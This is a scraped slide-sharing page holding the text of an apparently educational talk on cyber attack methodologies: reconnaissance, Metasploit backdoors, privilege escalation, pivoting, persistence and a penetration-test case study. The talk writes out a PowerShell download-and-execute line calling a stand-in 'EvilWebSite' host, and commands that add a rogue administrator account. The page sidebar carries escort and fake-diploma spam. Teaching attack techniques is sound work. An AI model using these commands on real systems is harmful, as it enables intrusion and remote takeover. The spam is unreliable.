PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
 
NetWitness
NetWitnessNetWitness
NetWitness
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Final report ethical hacking
Final report ethical hackingFinal report ethical hacking
Final report ethical hacking
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
certified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdfcertified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdf
 
certified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_contentcertified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_content
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 

Plus de Geeks Anonymes

Programmer sous Unreal Engine
Programmer sous Unreal EngineProgrammer sous Unreal Engine
Programmer sous Unreal EngineGeeks Anonymes
 
Implémentation efficace et durable de processus métiers complexes
Implémentation efficace et durable de processus métiers complexesImplémentation efficace et durable de processus métiers complexes
Implémentation efficace et durable de processus métiers complexesGeeks Anonymes
 
Managing Open Source Licenses (Geeks Anonymes)
Managing Open Source Licenses (Geeks Anonymes)Managing Open Source Licenses (Geeks Anonymes)
Managing Open Source Licenses (Geeks Anonymes)Geeks Anonymes
 
Reprendre le contrôle de ses données
Reprendre le contrôle de ses donnéesReprendre le contrôle de ses données
Reprendre le contrôle de ses donnéesGeeks Anonymes
 
Geeks Anonymes - Le langage Go
Geeks Anonymes - Le langage GoGeeks Anonymes - Le langage Go
Geeks Anonymes - Le langage GoGeeks Anonymes
 
Le rôle du testeur et le Blackbox testing
Le rôle du testeur et le Blackbox testingLe rôle du testeur et le Blackbox testing
Le rôle du testeur et le Blackbox testingGeeks Anonymes
 
Vulnérabilités au cœur des applications Web, menaces et contre-mesures
Vulnérabilités au cœur des applications Web, menaces et contre-mesures Vulnérabilités au cœur des applications Web, menaces et contre-mesures
Vulnérabilités au cœur des applications Web, menaces et contre-mesuresGeeks Anonymes
 
191121 philippe teuwen cryptographie et attaques materielles
191121 philippe teuwen cryptographie et attaques materielles191121 philippe teuwen cryptographie et attaques materielles
191121 philippe teuwen cryptographie et attaques materiellesGeeks Anonymes
 
"Surfez couverts !" - Conseils de Cyber securité
"Surfez couverts !" - Conseils de Cyber securité "Surfez couverts !" - Conseils de Cyber securité
"Surfez couverts !" - Conseils de Cyber securité Geeks Anonymes
 
Introduction au développement mobile - développer une application iOS et Andr...
Introduction au développement mobile - développer une application iOS et Andr...Introduction au développement mobile - développer une application iOS et Andr...
Introduction au développement mobile - développer une application iOS et Andr...Geeks Anonymes
 
Intelligence artificielle et propriété intellectuelle
Intelligence artificielle et propriété intellectuelleIntelligence artificielle et propriété intellectuelle
Intelligence artificielle et propriété intellectuelleGeeks Anonymes
 
Pour une histoire plophonique du jeu video
Pour une histoire plophonique du jeu videoPour une histoire plophonique du jeu video
Pour une histoire plophonique du jeu videoGeeks Anonymes
 
Become Rick and famous, thanks to Open Source
Become Rick and famous, thanks to Open SourceBecome Rick and famous, thanks to Open Source
Become Rick and famous, thanks to Open SourceGeeks Anonymes
 
Reconnaissance vocale et création artistique
Reconnaissance vocale et création artistiqueReconnaissance vocale et création artistique
Reconnaissance vocale et création artistiqueGeeks Anonymes
 
Natural Language Processing
Natural Language ProcessingNatural Language Processing
Natural Language ProcessingGeeks Anonymes
 
Sécurité, GDPR : vos données ont de la valeur
Sécurité, GDPR : vos données ont de la valeur Sécurité, GDPR : vos données ont de la valeur
Sécurité, GDPR : vos données ont de la valeur Geeks Anonymes
 

Plus de Geeks Anonymes (20)

Programmer sous Unreal Engine
Programmer sous Unreal EngineProgrammer sous Unreal Engine
Programmer sous Unreal Engine
 
Implémentation efficace et durable de processus métiers complexes
Implémentation efficace et durable de processus métiers complexesImplémentation efficace et durable de processus métiers complexes
Implémentation efficace et durable de processus métiers complexes
 
Managing Open Source Licenses (Geeks Anonymes)
Managing Open Source Licenses (Geeks Anonymes)Managing Open Source Licenses (Geeks Anonymes)
Managing Open Source Licenses (Geeks Anonymes)
 
Reprendre le contrôle de ses données
Reprendre le contrôle de ses donnéesReprendre le contrôle de ses données
Reprendre le contrôle de ses données
 
Geeks Anonymes - Le langage Go
Geeks Anonymes - Le langage GoGeeks Anonymes - Le langage Go
Geeks Anonymes - Le langage Go
 
Le rôle du testeur et le Blackbox testing
Le rôle du testeur et le Blackbox testingLe rôle du testeur et le Blackbox testing
Le rôle du testeur et le Blackbox testing
 
Kubernetes
KubernetesKubernetes
Kubernetes
 
Vulnérabilités au cœur des applications Web, menaces et contre-mesures
Vulnérabilités au cœur des applications Web, menaces et contre-mesures Vulnérabilités au cœur des applications Web, menaces et contre-mesures
Vulnérabilités au cœur des applications Web, menaces et contre-mesures
 
191121 philippe teuwen cryptographie et attaques materielles
191121 philippe teuwen cryptographie et attaques materielles191121 philippe teuwen cryptographie et attaques materielles
191121 philippe teuwen cryptographie et attaques materielles
 
"Surfez couverts !" - Conseils de Cyber securité
"Surfez couverts !" - Conseils de Cyber securité "Surfez couverts !" - Conseils de Cyber securité
"Surfez couverts !" - Conseils de Cyber securité
 
Introduction au développement mobile - développer une application iOS et Andr...
Introduction au développement mobile - développer une application iOS et Andr...Introduction au développement mobile - développer une application iOS et Andr...
Introduction au développement mobile - développer une application iOS et Andr...
 
Le langage rust
Le langage rustLe langage rust
Le langage rust
 
Test your code
Test your codeTest your code
Test your code
 
Intelligence artificielle et propriété intellectuelle
Intelligence artificielle et propriété intellectuelleIntelligence artificielle et propriété intellectuelle
Intelligence artificielle et propriété intellectuelle
 
Pour une histoire plophonique du jeu video
Pour une histoire plophonique du jeu videoPour une histoire plophonique du jeu video
Pour une histoire plophonique du jeu video
 
Become Rick and famous, thanks to Open Source
Become Rick and famous, thanks to Open SourceBecome Rick and famous, thanks to Open Source
Become Rick and famous, thanks to Open Source
 
Reconnaissance vocale et création artistique
Reconnaissance vocale et création artistiqueReconnaissance vocale et création artistique
Reconnaissance vocale et création artistique
 
Natural Language Processing
Natural Language ProcessingNatural Language Processing
Natural Language Processing
 
Sécurité, GDPR : vos données ont de la valeur
Sécurité, GDPR : vos données ont de la valeur Sécurité, GDPR : vos données ont de la valeur
Sécurité, GDPR : vos données ont de la valeur
 
Modern sql
Modern sqlModern sql
Modern sql
 

Dernier

Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrHenryBriggs2
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsMonica Sydney
 
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...kumargunjan9515
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtrahman018755
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoilmeghakumariji156
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirtrahman018755
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样ayvbos
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge GraphsEleniIlkou
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdfMatthew Sinclair
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsPriya Reddy
 
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdfMatthew Sinclair
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...gajnagarg
 
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制pxcywzqs
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理F
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.krishnachandrapal52
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查ydyuyu
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"growthgrids
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdfMatthew Sinclair
 
Call girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsCall girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsMonica Sydney
 

Dernier (20)

Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 
call girls in Anand Vihar (delhi) call me [🔝9953056974🔝] escort service 24X7
call girls in Anand Vihar (delhi) call me [🔝9953056974🔝] escort service 24X7call girls in Anand Vihar (delhi) call me [🔝9953056974🔝] escort service 24X7
call girls in Anand Vihar (delhi) call me [🔝9953056974🔝] escort service 24X7
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
 
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
 
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
 
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
 
Call girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsCall girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girls
 

Cyber Attack Methodologies

  • 2. 1. Objectives 2. Introduction 3. Cyber Attack Lifecycle 4. Vulnerabilities and Exploitation 5. Social Engineering and Advanced Persistent Threats 6. Example of a penetration test scenario 7. Conclusion
  • 4. Introduction  Frédéric De Pauw  Cyber Security specialist & ethical hacker Head Security Services @NRB Freelance Ethical Hacker (BE – LUX – US) https://be.linkedin.com/in/fdepauw
  • 5. Introduction  What is Cyber Crime?  Computer crime, or cybercrime, is crime that involves a computer and a network  Two types of Cyber Crime:  Technology is the Target. Enterprise, State systems, personal systems  Technology is the Instrument. Criminal activities on Internet  This session is focused on the first type
  • 6. Introduction Technology = Target Technology = instrument Distributed Deny of Service Pedopornography Hacking incitement to racial hatred Malwares, Ransomwares Incitement to terrorism Phishing Money Laundering Hacktivism Drug sell … Spam …
  • 7. Introduction  Cyber Crime  Drastically evolved over the past years, following the global evolution of ICT supporting human activity  Allow cyber criminals to make profit equivalent as other types of criminality  Offers some advantages over other criminal activities: anonymity, discretion, borderless  Remain little fought and with no international legislation  Has evolved to cyber war with state-sponsored attacks  Will affect our life (connected cars, Operational Technologies, IOT)  Cost of Cyber Crime in Belgium: 3,5 billion Euros
  • 8. Introduction Evolution of Cyber Crime S O P H I S T I C A T I O N 1985-1995 Entertainmen t First Worms Phone Hacking 2010-2017-… Hacktivism Virus Spread Website Defacement Organized Crime DDOS Company Systems Hacking Data Lead Industrial espionage Cyber War Targeted Attacks State-Sponsored Attacks
  • 9. Introduction Cyber War – NSA Hacking Tools Leak (2017) 2. NSA Contractor installs trojan 3. NSA Contractor runs full scan 1. NSA Contractor has NSA Hacking tools on his PC 4. Kaspersky AV discovers malware + NSA hacking tools 5. Russian spies are somehow aware of the discovery of NSA tools Kaspersky Denies giving info 6. Russian Spies further Hack contractor PC
  • 10. Introduction Cyber War – NSA Hacking Tools Leak
  • 11. Introduction  Future of Cyber Crime  Intensification of targeted cyber attacks against enterprises with important impacts (financial, image..)  Predominance of Advanced Persistence Threats targeting the end user  99% of System Compromises will still use unpatched Vulnerabilities  Intensification of cyber war / cyber espionage activities between nations  Increase of cyber crime targeting connected objects and operational technologies  MIRA botnet – 2017  Hackable Cardiac devices – 2017  WIFI Baby Heat Monitor device -2017  Jeep SUV Hack - 2015
  • 12. Introduction  Legal evolution  General Data Protection Regulation (GDPR) – adopted end of 2016 – comes into force 25 may 2018  Circulars of National Bank of Belgium  Regulation for financial sector  Data Breach notification standard  Within 72 hours  Fines in case of data leak  Max 4% of turnover, maximum 20 M€
  • 14. Cyber Attack Lifecycle - Public Information - Social Networks - Vulnerability Scanning - Physical Observation 1 Reconnaissance 2 Initial Infection - Vulnerabilities - Virus / Malware - Social Engineering - Physical Intrusion 3 Gain Control 4 Privilege Escalation Control infected system 5 Lateral Movement Compromise more systems deeper in the network 7 Malicious Activities Data Exfiltration Hacking Websites Money Extortion ..Gain elevated privileges on the infected system 6 Persistence Maintain persistent connection with infected systems
  • 15. Cyber Attack Lifecycle > Reconnaissance  Reconnaissance process is a key activity  Indeed, during this phase crucial information are obtained in order to perform a cyber attack  For instance, information will be used to determined the best attack vector to be used  Activities performed are:  Collect information concerning the target (websites, telephone numbers, general mailboxes..) through public information  Collect information through direct contact sur as phone calls (fake poll, job seeker..)  Collect technical information concerning the target information system (exposed systems, partners, data centers..)  Collect information on premises (garbage, WIFI scanning..)  Actively scan enterprise networks exposed on Internet
  • 16. Cyber Attack Lifecycle > Reconnaissance
  • 17. Cyber Attack Lifecycle > Reconnaissance  Following reconnaissance activities, attackers must have obtained enough information in order to determine best attack vectors in order to perform the initial infection phase  For instance:  Vulnerabilities infecting systems exposed on Internet  Lack of physical access to facilities  Social engineering attack on selected profiles from, for instance, social networks information
  • 18. Cyber Attack Lifecycle > Initial Infection  Initial Infection is aimed at obtaining a first backdoor within the target information system  Vectors:  Exploiting a vulnerability affecting the victim’s system(s)  Infection through Virus / Malware  Exploiting a physical vulnerability
  • 19. Cyber Attack Lifecycle > Initial Infection PerimeterPublic Cloud Private Cloud Corporate Network On Prem Applications Servers / Appliances Security Technology SAAS Applications Servers / Appliances Security Technology Corporate Applications Servers / Appliances Security Technology Corporate Applications Servers / Appliances Security Technology End Users
  • 20. Cyber Attack Lifecycle > Initial Infection
  • 21. Cyber Attack Lifecycle > Initial Infection  IDS/IPS Bypass  Encryption  Anti-Virus Bypass  Use simple Powershell as a dropper which fetches an encrypted payload over Internet  powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt '))  Unknown Viruses  Use Staging to decouple payload from initial dropper.  The dropper is injected directly into memory  Fileless malware infection  Firewall Bypass  Uses “reverse” connections which connect to the C&C  E.g. HTTPS passing through the Enterprise Proxy
  • 22. Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Create Powershell Payload
  • 23. Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Move Payload to evil Web Server
  • 24. Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Create the « Dropper »
  • 25. Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Start the Listener
  • 26. Cyber Attack Lifecycle > Gain Control  Once initial infection is performed, the objective is to get control over the machine.  For this a network connection must be established between the victim and the Command & Control Server  In general « reverse » connection is made to bypass inbound Firewall protection  Several techniques to bypass Outbound filtering (if present.)
  • 27. Cyber Attack Lifecycle > Gain Control  Standard Enterprise security principles for Outbound filtering:  Default policy is to deny all outbound connections  Allowed outbound connections must go through a proxy  Outbound connections must conform to the expected protocol  Outbound connections must pass other checks as well.  Outbound filtering evasion techniques examples  Reverse HTTP and / or HTTPS traffic (without or with Proxy settings verification  Payload Staging over DNS by setting the payload into TXT Records of a Domain
  • 28. Cyber Attack Lifecycle > Gain Control  Metasploit / Meterpreter  Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
  • 29. Cyber Attack Lifecycle > Privilege Escalation  Escalate privileges from infected machines in order gain elevated access  Typical example is getting Administrator privileges  Several techniques  « Local Exploits » from local applications on the infected machine  Manual search for credentials in scripts  Password Hashes dump (e.g. SAM, /etc/passwd) and cracking  Authenticated Sessions grabbing (e.g. VPN Sessions)  LSASS Process Dump (MimiKatz)  SSH Keys  World Writeable files  Read command history files  Batches / Jobs alteration  Process Injection  Try injecting malicious code in processes running under « Domain Admin » privileged user
  • 30. Cyber Attack Lifecycle > Privilege Escalation  Metasploit: « Incognito » module  Allows to impersonate authentication tokens on compromised windows hosts  Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see interesting authentication tokens  TIP: File servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts
  • 31. Cyber Attack Lifecycle > Lateral Movement  From Infected systems, try to infect more systems deeper in the Network  Basically repeat the cyber Attack Lifecycle process (recon, initial infection, privilege escalation…)  Aim for high value systems, windows domain controllers, file servers..  Techniques  Credential re-use / pass-the-hash / SSH keys re-use  Internal applications vulnerabilities (less often patched)  Network segmentation issues between environments ( e.g. Port 445) – PsExec with Pass-The-Hash
  • 32. Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems
  • 33. Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Use Autoroute to make the compromised host a pivot to other networks
  • 34. Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Scan the network through the route created on ports 139 & 445
  • 35. Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Start a new session on a new host using PsExec and “Pass-The- Hash” technique re-using local Administrator password hash
  • 36. Cyber Attack Lifecycle > Maintain Persistence  Prevent loss of connection between infected machines and the C&C  Techniques  Create jobs / schedule tasks  Create service running on startup  Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)  Bootkit / Rootkit  Default file association  Logon Scripts  Modification of Applications / Services  Registry RUN keys
  • 37. Cyber Attack Lifecycle > Maintain Persistence  Metasploit / Persistence module  Create a Meterpreter service which will start when the compromised host boots
  • 38. Cyber Attack Lifecycle > Maintain Persistence  Metasploit / Persistence module  Create a Meterpreter service which will start when the compromised host boots
  • 39. Cyber Attack Lifecycle > Demo  Social Engineering scenario  Send a « Virus » to the victim which consists of a Metasploit Meterpreter instance  Undetected by up to date commercial antivirus 1. Prepare Malware & environment 2. Send Malware 3. Execute Malware 4. Get infected & Contact C&C 5. Interact
  • 41. Vulnerabilities and Exploitation  A vulnerability is a flaw in a system which allows a malicious user to compromise its Confidentiality, Integrity and / or its availability  Simple – Default Password. Complex – Buffer Overflow in an application  Dozens of new vulnerabilities officially classified everyday  http://www.cvedetails.com  Dozen of others are not disclosed!  0DAY – Vulnerabilities not discovered, or not disclosed  Vulnerabilities are discovered by  Researchers, students (Ethical Hackers)  Professional researchers ( Vulnerability Brokers )  http://www.zerodayinitiative.com/  France- Vupen Security – Sells vulnerabilities to NASA  Cyber Criminals( 0DAYS )
  • 42. Vulnerabilities and Exploitation  Full Disclosure principle  Vulnerabilities are reported and published publicly as soon as discovered without taking into account that a patch is available  Responsible disclosure principle  Vendors are notified first  Vulnerability is publicly disclosed after 45 days  Websites with vulnerabilities and associated exploits  www.securityfocus.com  www.1337day.com (not free)  http://www.cvedetails.com/  http://www.exploit-db.com/  Underground Websites on TOR network  Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR) ccc.de (ALL), blackhat.com (US)
  • 44. Vulnerabilities and Exploitation  Complexity of systems, applicative codes, communication flows, network segmentation  Out-of-the-box vulnerabilities of Vendor solutions, lack of security configuration  Next->Next->Next Syndrome  Lack of secure coding awareness  TOP 10 OWASP  Lack of enforcement for Security during IT Projects  Security implies Cost and Time  Need for functionality <-> Need for security  BlackList Mode  Learning Mode
  • 45. Social Engineering and Advanced Persistent Threats
  • 46. Human Vulnerabilities / Social Engineering Social engineering is the preferred attack vector as it is generally easier to bypass preventive security measures Targets can be the company employees but also partners / subcontractors Two types of social engineering: Human SE Technical SE
  • 47. Human Vulnerabilities / Social Engineering Technical SE is aimed at compromising end user systems Transmission of the malware follows « authorized » routes, such as e- mail and/or web browsing Bypass security measures such as perimeter security, firewalls,.. 1. INFECTION 2. CONTROL
  • 48. Human Vulnerabilities / Social Engineering Attack methodologies: Encourage users to install tools such as « TeamViewer » or « LogMeIn » Send malware through e-mail Word/Excel with malicious Macros PDF files exploiting PDF vulnerabilities Send mail containing links to malicious web sites Send Phishing SMS on Smartphones (SMShing) Drop USB Keys containing Viruses (STUXNET) USB Gadgets configured to simulate a Keyboard
  • 49. Human Vulnerabilities / Social Engineering Nowadays systems are in general protected against USB Infection through autorun functionality New method -> « Hacker Interface Devices » Attackers embed malicious code within USB Gadgets Once connected, those gadgets simulate being a keyboard and start sending commands to the computer (Keystroke Injection) Those commands can drop a malware as easily as other techniques Ref: http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe USB Gadgets
  • 51. Penetration test example Context: Black Box Intrusion test. Scope: External- facing systems Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’EntrepriseInternal Network
  • 52. Penetration test example VULN 1/2: Vulnerable deployment of SAP BO ( Apache Axis2 ) CVE-2010-0219 , Apache Axis2 Default Credentials http://www.securityfocus.com/bid/40343 , Apache Axis2 Directory traversal See earlier: Vuln « Directory Traversal » Vuln « Default Password » Allows to have admin credentials to Axis2
  • 54. Penetration test example Access to Axis2 administration allows to upload a Web Service and LIVE deployment of it
  • 55. Penetration test example A metasploit module exists to exploit this vuln Axis2 / SAP BusinessObjects Authenticated Code Execution http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer We use it to deploy a reverse shell backdoor on the server to connect back to port 80 VULN 3: Servers is allowed to contact any host on Internet on port 80 and 443 Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’Entreprise C&C SERVER – PORT 80 Port 80 Internal Network
  • 56. Penetration test example Not possible to upload a meterpreter (killed by AV on the machine) Possible to upload a backdoor which sends me back a DOS command prompt on the server
  • 57. Penetration test example Next steps: Create privileged account on the server VULN 4: Application server is running under ADMIN privileges Net user temptest password /add Net localgroup Administrators hacked /add Obtain a Remote Desktop connection Problem: Port 3389 closed Inbound Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389 Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443
